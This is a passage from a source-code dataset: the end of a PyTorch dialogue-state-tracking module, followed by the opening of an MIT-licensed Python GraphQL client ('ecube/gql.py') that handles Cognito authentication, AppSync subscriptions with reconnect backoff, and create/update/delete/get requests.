out['embedded_in_txt'] = self.layer_norm[count](self.in_embed(batch.in_txt))
count += 1
if self.args.detach_dial_his:
out['embedded_in_his'] = self.layer_norm[count](self.in_embed(batch.in_his))
count += 1
return out
def track_state(self, batch, out):
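        # Route the slot tracker over whichever contexts the flags enable:
        # the current turn always, plus the detached dialogue history and/or
        # the previous dialogue state when those options are set.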
if not self.args.add_prev_dial_state and not self.args.detach_dial_his:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_txt'], batch.in_txt_mask)
elif not self.args.add_prev_dial_state:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_in_txt'], batch.in_txt_mask)
elif not self.args.detach_dial_his:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_state'], batch.in_state_mask, out['embedded_in_txt'], batch.in_txt_mask)
else:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_state'], batch.in_state_mask, out['embedded_in_txt'], batch.in_txt_mask)
if self.args.domain_flow:
if not self.args.detach_dial_his:
out['out_domains'] = self.domain_dst(out['embedded_domains'], None, out['embedded_in_txt'], batch.in_txt_mask)
else:
out['out_domains'] = self.domain_dst(out['embedded_domains'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_in_txt'], batch.in_txt_mask)
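            # Broadcast domain states [B, D, 1, H] against slot states
            # [B, 1, S, H] and multiply elementwise, yielding one state vector
            # per (domain, slot) pair (shapes assumed from the
            # unsqueeze/expand calls below).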
out_domains = out['out_domains'].unsqueeze(2)
out_slots = out['out_slots'].unsqueeze(1)
out_domains = out_domains.expand(out_domains.shape[0], out_domains.shape[1], out_slots.shape[2], out_domains.shape[3])
out_slots = out_slots.expand(out_slots.shape[0], out_domains.shape[1], out_slots.shape[2], out_slots.shape[3])
out['out_states'] = out_domains * out_slots
if self.args.domain_slot_dst:
out_states = out['out_states']
original_size = out_states.shape
out_states = out_states.view(out_states.shape[0], -1, out_states.shape[-1])
out_states = self.domain_slot_dst(out_states, batch.domain_slot_mask)
out['out_states'] = out_states.view(*original_size)
else:
out['out_states'] = out['out_slots']
return out
class DST(nn.Module):
def __init__(self, layer, N):
super(DST, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def load_pretrained(self, pretrained_dst):
count = 0
for layer in self.layers:
layer.load_pretrained(pretrained_dst.layers[count])
count += 1
self.norm.load_pretrained(pretrained_dst.norm)
def forward(self, states, states_mask, in_txt1=None, in_mask1=None,
in_txt2=None, in_mask2=None, in_txt3=None, in_mask3=None):
for layer in self.layers:
states = layer(states, states_mask, in_txt1, in_mask1, in_txt2, in_mask2, in_txt3, in_mask3)
return self.norm(states)
| 46.112069
| 203
| 0.646476
|
4a144bf85b021a5081ba9d92c0b05d5412ec74b5
| 40,302
|
py
|
Python
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | 2
|
2020-09-26T01:24:17.000Z
|
2020-09-27T18:56:16.000Z
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | 26
|
2020-08-19T15:50:02.000Z
|
2020-08-19T15:50:17.000Z
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | null | null | null |
'''
Copyright (c) 2020 epiphani, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from __future__ import print_function
import sys
import appsync_subscription_manager as asm
import warrant
import os
from datetime import datetime
import threading
import pprint
import ecube.environments as environments
import time
import requests
import hashlib
import json
import traceback
import signal
import ecube.gql_operations.Mutations as Mutations
import ecube.gql_operations.Queries as Queries
import ecube.gql_operations.Localops as Localops
import base64
import codecs
import six
import re
from future.utils import iteritems
import copy
ENVIRONMENTS = environments.ENVIRONMENTS
ARTIBOT_USERNAME = "artibot"
# Read GQL URL
LOCAL_GQL_HOST = os.environ.get('LOCAL_GQL_HOST', "localhost")
LOCAL_GQL_PORT = os.environ.get('LOCAL_GQL_PORT', "31050")
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
GQL_PSK = os.environ.get("GQL_PSK", 'SAANPD00D')
LOG_DIR = "/var/log/epiphani/"
# AppMgr dictionary access lock
APPMGR_LOCK = threading.Lock()
# Subscriptions retry logic
APPSYNC_SUB_RETRY_MAP = {}
MAX_BACKOFF_TIME = 10
class WorkerPool():
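    # Minimal thread-based stand-in mirroring multiprocessing.Pool's
    # apply_async() signature: each task simply runs in its own thread.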
def apply_async(self, t_func, t_args):
threading.Thread(target=t_func, args=t_args).start()
class GetObjError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(GetObjError, self).__init__(*args, **kwargs)
class ListObjectsError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(ListObjectsError, self).__init__(*args, **kwargs)
class DeleteObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(DeleteObjectError, self).__init__(*args, **kwargs)
class InsertObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(InsertObjectError, self).__init__(*args, **kwargs)
class UpdateObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(UpdateObjectError, self).__init__(*args, **kwargs)
class Logger():
DEBUG = 1
INFO = 2
ERROR = 3
OFF = 4
def __init__(self, log_to_file=True, log_file=None):
self.my_pid = os.getpid()
self.log_to_file = log_to_file
self.log_file = log_file
        if log_file is None:
            log_file = LOG_DIR + "ExecRunbook.%d.log" % (self.my_pid)
            # Ensure the default log directory exists before opening the file.
            if self.log_to_file and not os.path.isdir(LOG_DIR):
                os.mkdir(LOG_DIR)
        #print("Initializing logger for PID: %d" % (self.my_pid))
        if self.log_to_file:
            self.log_file = open(log_file, "w")
self.log_level = Logger.OFF
self.write = self.log_file.write
self.flush = self.log_file.flush
self.stream = self.log_file
else:
self.write = sys.stdout.write
self.flush = sys.stdout.flush
self.stream = sys.stdout
def is_valid_log_level(self, log_level):
l = False
try:
if not ((log_level < Logger.DEBUG) or (log_level > Logger.OFF)):
l = True
except:
pass
return l
def set_log_level(self, log_level):
if not self.is_valid_log_level(log_level):
print("ERROR: Trying to set Invalid log level: %r" % (log_level))
sys.exit(-1)
self.log_level = log_level
def get_log_level(self):
return self.log_level
def get_log_level_str(self, log_level):
if log_level == Logger.OFF:
return "OFF"
elif log_level == Logger.DEBUG:
return "DEBUG"
elif log_level == Logger.INFO:
return "INFO"
elif log_level == Logger.ERROR:
return "ERROR"
else:
return "INVALID_LOG_LEVEL(%s)" % (str(log_level))
def log(self, log_level, log_str):
if self.is_valid_log_level(log_level):
if log_level >= self.log_level:
self.write("%s: %d: %s: %r\n" % (datetime.now().strftime("%m/%d/%Y, %H:%M:%S"), self.my_pid, self.get_log_level_str(log_level), log_str))
else:
self.write("%s: %d: %s: %r\n" % (datetime.now().strftime("%m/%d/%Y, %H:%M:%S"), self.my_pid, self.get_log_level_str(log_level), log_str))
self.flush()
def pprint(self, log_level, log_obj):
if self.is_valid_log_level(log_level):
if log_level >= self.log_level:
pprint.pprint(log_obj, stream=self.stream)
self.write("\n")
else:
self.write("%d: %r\n" % (self.my_pid, self.get_log_level_str(log_level)))
pprint.pprint(log_obj, stream=self.stream)
self.write("\n")
self.flush()
def set_gql_psk(gql_psk):
global GQL_PSK
GQL_PSK = gql_psk
asm.set_gql_psk(gql_psk)
def set_local_gql_host(lgh):
global LOCAL_GQL_HOST
global LOCAL_GQL_FRAG
LOCAL_GQL_HOST = lgh
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
def set_local_gql_port(lgp):
global LOCAL_GQL_PORT
global LOCAL_GQL_FRAG
LOCAL_GQL_PORT = lgp
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
def init_local_env(username):
return {
'endpoint': "http://%s:%s/graphql" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT),
'id_token': None,
'username': username,
'current_env': None,
}
# calculate and return the md5sum of the contents of a given file
def get_file_md5sum(file_name):
with open(file_name, "rb") as f:
file_hash = hashlib.md5()
t = f.read(8192)
while t:
file_hash.update(t)
t = f.read(8192)
return file_hash.hexdigest()
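# Usage sketch (path hypothetical): get_file_md5sum("/tmp/playbook.json")
# reads the file in 8 KB chunks and returns its 32-character hex MD5 digest.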
def initEnv(current_env, logger):
users = get_env_var(current_env, 'USERS')
gql_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
user_list = []
user_dict = {}
username_dict = {}
# Initialize the environment
init_environment(current_env, users, user_list, user_dict, username_dict, logger)
myauth = users[0]['auth']
ret = {
'id_token': myauth.id_token,
'username': myauth.username,
'current_env': current_env,
'endpoint': gql_endpoint
}
return ret
def setup_env_and_subscribe(sub_list=None, appsync_sub_mgrs_map=None, logger=None,
on_connection_error=None, on_error=None, on_sub_error=None,
on_close=None, current_env=None, on_subscription_success=None,
use_local_instance=False):
tmp_dict = {}
user_list = []
user_dict = {}
username_dict = {}
# Setup vars for the environment
if not use_local_instance:
users = get_env_var(current_env, 'USERS')
gql_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
# Initialize the environment
init_environment(current_env, users, user_list, user_dict, username_dict, logger)
for tmp_user in users:
tmp_dict[tmp_user['username']] = tmp_user['auth'].id_token
username = users[0]['username']
id_token = users[0]['auth'].id_token
else:
users = []
gql_endpoint = "http://" + LOCAL_GQL_FRAG + "/graphql"
username = "admin"
id_token="NOT_ID_TOKEN_NEEDED"
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
asm.set_gql_psk(GQL_PSK)
check_and_subscribe(endpoint=gql_endpoint, endpoint_user_dict=tmp_dict,
username=username, id_token=id_token, use_local_instance=use_local_instance,
sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=current_env, on_subscription_success=on_subscription_success)
def cf_on_close(cb_data):
# Remove the current subscription manager and create
# a new one
ep = cb_data['endpoint']
logger = cb_data['kwargs']['logger']
kwargs = cb_data['kwargs']
logger.log(Logger.ERROR, "CF: Got Socket close for EP: %s" % (ep))
logger.log(Logger.INFO, "CF: Calling APP Socket 'on-close'")
kwargs['on_close'](cb_data)
logger.log(Logger.INFO, "CF: Cleaning up EP: %s" % (ep))
first_retry = False
APPMGR_LOCK.acquire()
kwargs['appsync_sub_mgrs_map'].pop(ep, None)
retry_map = APPSYNC_SUB_RETRY_MAP.get(ep)
if not retry_map:
first_retry = True
retry_map = {'prev_ts': datetime.now(), 'backoff_time': 1}
APPSYNC_SUB_RETRY_MAP[ep] = retry_map
APPMGR_LOCK.release()
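    # Exponential backoff: double the wait on each quick successive disconnect,
    # cap it at MAX_BACKOFF_TIME, and reset to 1 second once the endpoint has
    # been quiet for more than 10x the cap.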
if not first_retry and retry_map['backoff_time'] < MAX_BACKOFF_TIME:
time_diff = int((datetime.now() - retry_map['prev_ts']).total_seconds())
if time_diff < retry_map['backoff_time']:
retry_map['backoff_time'] *= 2
elif time_diff > (MAX_BACKOFF_TIME * 10):
# If the last disconnect was more than 10 max backoff ago,
# then reset the backoff to default 1 second.
retry_map['backoff_time'] = 1
if retry_map['backoff_time'] > MAX_BACKOFF_TIME:
retry_map['backoff_time'] = MAX_BACKOFF_TIME
logger.log(Logger.INFO, "CF: Sleeping for %d seconds before retrying" % (retry_map['backoff_time']))
time.sleep(retry_map['backoff_time'])
retry_map['prev_ts'] = datetime.now()
logger.log(Logger.INFO, "CF: Re-Subscribing EP: %s" % (ep))
setup_env_and_subscribe(sub_list=kwargs['sub_list'],
appsync_sub_mgrs_map=kwargs['appsync_sub_mgrs_map'], logger=kwargs['logger'],
on_connection_error=kwargs['on_connection_error'],
on_error=kwargs['on_error'], on_sub_error=kwargs['on_sub_error'],
on_close=kwargs['on_close'], current_env=kwargs['current_env'],
on_subscription_success=kwargs['on_subscription_success'],
use_local_instance=kwargs['use_local_instance'])
'''
Since we store the args that are passed to check & subscribe, we
want to make sure that all the arguments are KW args so that they
can be stored & later passed back to this function on a socket
close for reconnection.
ALL THE ARGS SHOULD BE KWARGS.
'''
def check_and_subscribe(endpoint=None, endpoint_user_dict=None, username=None,
id_token=None, sub_list=None, appsync_sub_mgrs_map=None, logger=None,
on_connection_error=None, on_error=None, on_sub_error=None, on_close=None,
current_env=None, on_subscription_success=None, use_local_instance=False):
# MUST BE THE VERY FIRST LINE IN THIS FUNCTION!
cur_args = locals()
if endpoint in appsync_sub_mgrs_map:
logger.log(Logger.DEBUG, "Sub Mgr already exists for endpoint: %s user: %s" % (endpoint, username))
return False
tmp_cb_data = {
'current_env': current_env,
'endpoint': endpoint,
'username': username,
'id_token': id_token,
'endpoint_user_dict': endpoint_user_dict,
'kwargs': cur_args,
'use_local_instance': use_local_instance,
'gql_psk': GQL_PSK
}
my_mgr = asm.AppSyncSubscriptionManager(id_token = id_token,
appsync_api_id = endpoint.split('/')[2].split('.')[0],
on_connection_error = on_connection_error,
on_error = on_error,
on_close = cf_on_close,
use_local_instance = use_local_instance,
cb_data = tmp_cb_data)
sub_dict = {}
for tmp_set in sub_list:
sub_query = tmp_set[0]
on_message = tmp_set[1]
if len(tmp_set) == 3:
sub_filter = tmp_set[2]
else:
sub_filter = {}
my_sub = my_mgr.subscribe(sub_query, on_message, on_sub_error,
on_subscription_success, sub_filter=sub_filter)
sub_dict[my_sub.get_id()] = my_sub
tmp_cb_data['subscriptions'] = sub_dict
tmp_cb_data['manager'] = my_mgr
appsync_sub_mgrs_map[endpoint] = tmp_cb_data
x = threading.Thread(target=my_mgr.run_forever, args=())
x.start()
return True
def gql_main_loop(current_env, logger, users, blacklisted_tokens,
user_list, user_dict, username_dict, sleep_time, sub_list,
appsync_sub_mgrs_map, on_error,
on_sub_error, on_connection_error, on_close,
on_subscription_success, use_local_instance=False):
global ENVIRONMENTS
init_done = False
env_list = []
set_env_var(current_env, 'USERS', users)
try:
while True:
if (use_local_instance or current_env) and not init_done:
if use_local_instance or (current_env in ENVIRONMENTS):
setup_env_and_subscribe(sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=current_env, on_subscription_success=on_subscription_success,
use_local_instance=use_local_instance)
else:
logger.log(Logger.ERROR, "Could not find CURRENT_ENV: %s" % (current_env))
init_done = True
elif not current_env and not init_done:
# Remove PROD to be processed in dev
if 'PROD' in env_list:
logger.log(Logger.INFO, "Removing PROD from env list...")
env_list.remove('PROD')
for env in env_list:
if env in ENVIRONMENTS:
setup_env_and_subscribe(sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=env, on_subscription_success=on_subscription_success)
else:
logger.log(Logger.ERROR, "Could not find ENV: %s" % (env))
init_done = True
# logger.log(Logger.DEBUG, "Sleeping for %d secs..." % sleep_time)
time.sleep(sleep_time)
except KeyboardInterrupt as e:
os.kill(os.getpid(), signal.SIGTERM)
def get_env_var(env, var):
return ENVIRONMENTS[env][var]
def set_env_var(env, var, val):
ENVIRONMENTS[env][var] = val
def init_environment(env, users, user_list, user_dict, username_dict, logger):
# First clean the user_list (in case its a re-init)
del user_list[:]
# Authenticate all the users...
for user in users:
user_list.append(user['username'])
# create a cognito user object
u = warrant.Cognito(get_env_var(env, 'COGNITO_USER_POOL_ID'),
get_env_var(env, 'COGNITO_USER_POOL_CLIENT_ID'),
username=user['username'])
try:
# Try to authenticate the user
u.authenticate(password=user['passwd'])
except Exception as e:
# Authentication failed...
logger.log(Logger.ERROR, "%r" % (e))
sys.exit(2)
# Save the authenticated cognito user object
user['auth'] = u
# get the user ID by decoding the id_token
decoded = u.verify_token(u.id_token, 'id_token', 'id')
user['id'] = decoded['sub']
user['decoded_id_token'] = decoded
# Save the warrant cognito user object in the USER ID MAP
user_dict[decoded['sub']] = u
username_dict[user['username']] = u
set_env_var(env, 'USERNAME_DICT', username_dict)
set_env_var(env, 'USER_DICT', user_dict)
def check_user_token(current_env, endpoint, username, username_dict):
env_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
if env_endpoint == endpoint:
a = username_dict.get(username, None)
if a:
return a.id_token
return None
'''
This function takes a function pointer and executes it.
If the execution results in a 'token expired' error, it
will try to re-authenticate the 'username' with its
password from the current_env & if successful, will use
that new token and retry the function call.
ARGUMENTS:
func: Function that should be called and retried
args: Arguments for 'func' or () if no arguments
kwargs: Keyword arguments for 'func' or {} if no keyword arguments
current_env: Current environment string
username: Username that should be used for retrying if 'func'
fails due to 'token expired' error
id_token_index: Index of the ID token in 'args' or -1
endpoint_index: Index of the endpoint URL in 'args' above or -1
The next 3 arguments should be passed from
when the environment was originally initialized
user_list: list of users in this environment
user_dict: dictionary of users keyed of user id
username_dict: dictionary of users keyed of username
logger: Instance of 'Logger' class to be used for logs
'''
def execute_function_with_retry(func, args, kwargs, current_env,
username, id_token_index, endpoint_index,
user_list, user_dict, username_dict, logger,
use_local_instance=False):
retried_already = False
if use_local_instance:
kwargs.update({'use_local_instance': use_local_instance})
current_env = None
while True:
try:
# Try to get an updated token before calling the function
# But not if this is a local instance
if (not use_local_instance) and current_env and endpoint_index >= 0:
new_token = check_user_token(current_env, args[endpoint_index], username, username_dict)
if new_token:
args = args[:id_token_index] + (new_token,) + args[(id_token_index + 1):]
return func(*args, **kwargs)
except Exception as e:
err_str = str(e)
if use_local_instance:
logger.log(Logger.ERROR, "Using local instance, cannot retry")
raise
if not current_env:
logger.log(Logger.ERROR, "No ENV set, cannot retry")
raise
# Trying to handle more cases of unauthorized access. Most of the times
# we get reason as "token is expired" but sometimes we also get "unauthorized".
if "code: 401 reason: unauthorized" in err_str.lower():
if not retried_already:
retried_already = True
logger.log(Logger.ERROR, "%s failed, %s, retrying" % (func.__name__, str(e)))
try:
init_environment(current_env, get_env_var(current_env, 'USERS'),
user_list, user_dict, username_dict, logger)
except Exception as e:
logger.log(Logger.ERROR, "Retry failed: env initialization failed")
raise
# rebuild args with new id_token
if username in username_dict:
logger.log(Logger.DEBUG, "Updated token for user: " + username)
args = args[:id_token_index] + (username_dict[username].id_token,) + args[(id_token_index + 1):]
else:
logger.log(Logger.ERROR, "Could not find USER: %s" % (username))
raise
else:
logger.log(Logger.ERROR, "Already tried once, giving up")
raise
else:
logger.log(Logger.ERROR, "Unhandled error, cannot retry")
raise
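# Usage sketch (function name and arg layout hypothetical):
#   execute_function_with_retry(
#       list_objects, (gql_endpoint, id_token, "Incident"), {},
#       current_env, username,
#       1,   # id_token_index: position of the token inside the args tuple
#       0,   # endpoint_index: position of the endpoint inside the args tuple
#       user_list, user_dict, username_dict, logger)
# On a 401 the environment is re-initialized once and the call retried with
# the refreshed token spliced back into the args tuple.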
def plural(m):
if (m[-1] == 's' or m[-1] == 'h'):
return (m+"es")
else:
return (m+"s")
def make_lower(val):
return val[0].lower() + val[1:]
def capitalize(val):
if not isinstance(val, six.string_types):
return ''
s = val[0].upper()
t = ""
i = 1
while i < len(val):
        if re.match(r'[A-Z]', val[i]):
            t += val[i]
            i += 1
elif (len(t) > 0):
s = s + t[0:-1].lower() + t[len(t) - 1] + val[i:]
return s
else:
s = s + val[i:]
            return s
    return s
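# Examples (with the index increment above): capitalize("incident") ->
# "Incident"; capitalize("APIKey") -> "ApiKey" (a run of capitals keeps its
# last letter upper-cased and lowers the rest).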
def load_content(content):
return json.loads(content if six.PY2 else content.decode('utf-8'))
def add_model_mapping(model_name, obj):
mmap = Localops.MODEL_MAPPING.get(model_name, None)
if mmap:
for (k, v) in iteritems(mmap):
obj[k] = {"connect": {"id": obj[v]}}
return obj
def add_model_relation(model_name, obj):
mr = Localops.MODEL_RELATION.get(model_name, None)
if mr:
for field in mr:
obj[field] = {"set":obj[field]}
return obj
def convert_filter(aws_filter):
if not aws_filter:
return aws_filter
local_filter = {}
for (key, value) in iteritems(aws_filter):
if isinstance(value, six.string_types):
local_filter[key] = value
continue
for (k, v) in iteritems(value):
if k == 'eq':
new_key = key
elif k == 'ne':
new_key = key + '_not'
elif k == 'lt':
new_key = key + '_lt'
elif k == 'lte':
new_key = key + '_lte'
elif k == 'gt':
new_key = key + '_gt'
elif k == 'gte':
new_key = key + '_gte'
elif k == 'contains':
new_key = key + '_contains'
elif k == 'notContains':
new_key = key + '_not_contains'
elif k == 'between':
new_key = key +'_not_starts_with'
elif k == 'beginsWith':
new_key = key +'_starts_with'
else:
new_key = key
local_filter[new_key] = v
return local_filter
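# Example mapping (AWS AppSync style -> local GQL style):
#   {"name": {"beginsWith": "db"}, "state": {"ne": "DONE"}}
#   -> {"name_starts_with": "db", "state_not": "DONE"}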
# Get the Auth header for passing to a requests library call (GET, POST, etc.)
def get_auth_header(id_token, use_local_instance=False):
if not use_local_instance:
return {"Authorization": id_token}
elif GQL_PSK:
return {"X-Api-Key": GQL_PSK}
else:
raise ValueError("No Pre Shared Key set for local instance authentication")
# Remove an object of a given model
def remove_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
# Set the input for delete object query
vars = {"input": {"id": obj['id']}}
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "delete" + updated_model_name
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Delete object request failed: " + str(e)
raise DeleteObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to delete object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise DeleteObjectError(s)
else:
s = "ERROR: Failed to delete object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise DeleteObjectError(s)
# Insert an object of a given model
def insert_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
# Set the input for insert object query
if use_local_instance:
deleteList=['UsersCanView', 'UsersCanAccess', "GroupsCanView", 'GroupsCanAccess']
for elem in deleteList:
if elem in obj:
del obj[elem]
obj = add_model_mapping(model_name, obj)
obj = add_model_relation(model_name, obj)
vars = {"input": obj}
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "create" + updated_model_name
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Insert object request failed: " + str(e)
raise InsertObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to insert object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise InsertObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to insert object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise InsertObjectError(s)
# Update an object of a given model
def update_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
vars = {}
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "update" + updated_model_name
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Set the input for update object query
if use_local_instance:
obj = copy.deepcopy(obj)
model_id = obj['id']
deleteList=['UsersCanView', 'UsersCanAccess', "GroupsCanView", 'GroupsCanAccess', 'id']
for elem in deleteList:
if elem in obj:
del obj[elem]
# obj = add_model_mapping(model_name, obj)
obj = add_model_relation(model_name, obj)
vars['where'] = {'id': model_id}
vars["input"] = obj
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Update object request failed: " + str(e)
raise UpdateObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to update object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise UpdateObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to update object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise UpdateObjectError(s)
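# Usage sketch (hypothetical endpoint, token and model name): the three
# helpers above share the same calling convention.
#   obj = insert_obj(endpoint, id_token, "device", {"name": "dev-1"})
#   obj["name"] = "dev-2"
#   update_obj(endpoint, id_token, "device", obj)
#   remove_obj(endpoint, id_token, "device", obj)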
def update_obj_custom(endpoint, id_token, model_name, obj,
connector, connector_name, use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
# Set the input for update object query
vars = {"input": obj}
updated_model_name = model_name[0].upper() + model_name[1:]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
        res = load_content(r.content)
except Exception as e:
s = "Update object request failed: " + str(e)
raise UpdateObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to update object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise UpdateObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to update object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise UpdateObjectError(s)
# Get a specific object of a given model with specified field as key
def get_obj(endpoint, id_token, model_name, vars,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if not queries_module:
queries_module = Queries
if use_local_instance:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "get" + updated_model_name
elif secondaryKeyFunction:
connector_name = model_name
updated_model_name = model_name
else:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "get" + updated_model_name
filter_vars = vars
if use_local_instance:
connector = Localops.LOCALOPS[connector_name.lower()]
        filter_vars = {'filter': vars}
elif custom_query:
connector = custom_query
else:
connector = queries_module.QUERIES[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": filter_vars})
res = load_content(r.content)
except Exception as e:
